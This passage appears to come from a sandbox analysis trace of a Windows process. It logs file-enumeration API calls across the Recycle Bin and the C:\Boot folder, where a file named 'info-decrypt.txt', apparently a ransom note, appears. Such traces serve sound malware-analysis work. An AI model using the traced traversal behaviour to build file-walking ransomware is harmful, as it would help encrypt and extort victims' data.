dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.310] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.310] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0093.310] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0093.310] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.310] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.311] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.311] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0093.311] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0093.311] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.311] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eeb80) returned 1 [0093.312] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eeb8c) returned 1 [0093.313] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6eebc0) returned 1 [0093.313] GetFullPathNameW (in: lpFileName="C:\\Boot", nBufferLength=0x105, lpBuffer=0x6ee6c8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot", lpFilePart=0x0) returned 0x7 [0093.313] GetFullPathNameW (in: lpFileName="C:\\Boot\\", nBufferLength=0x105, lpBuffer=0x6ee69c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\", lpFilePart=0x0) returned 0x8 [0093.315] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x6ee8e8 | out: lpFindFileData=0x6ee8e8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xfccd7780, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccd7780, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.315] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.315] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xfccd7780, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccd7780, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.315] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xfccd7780, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccd7780, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.316] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x90cd45e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x90cd45e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0093.316] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac2e8a60, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x9098e7a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5400, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0093.316] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0093.316] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0093.316] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0093.317] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0093.317] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0093.317] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0093.317] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0093.317] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0093.318] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0093.318] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0093.318] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0093.318] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0093.318] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0093.319] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfccd7780, ftCreationTime.dwHighDateTime=0x1d68bac, ftLastAccessTime.dwLowDateTime=0xfccd7780, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccd7780, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x4d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="info-decrypt.txt", cAlternateFileName="INFO-D~1.TXT")) returned 1 [0093.319] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0093.319] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0093.319] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0093.319] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0093.319] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0093.320] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0093.320] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0093.320] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0093.320] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0093.320] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0093.320] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0093.320] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0093.321] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0093.321] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0093.321] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0093.321] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0093.321] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.321] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xfccd7780, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccd7780, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.321] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xfccd7780, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccd7780, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.322] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x90cd45e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x90cd45e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0093.322] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac2e8a60, ftLastAccessTime.dwHighDateTime=0x1d2de32, 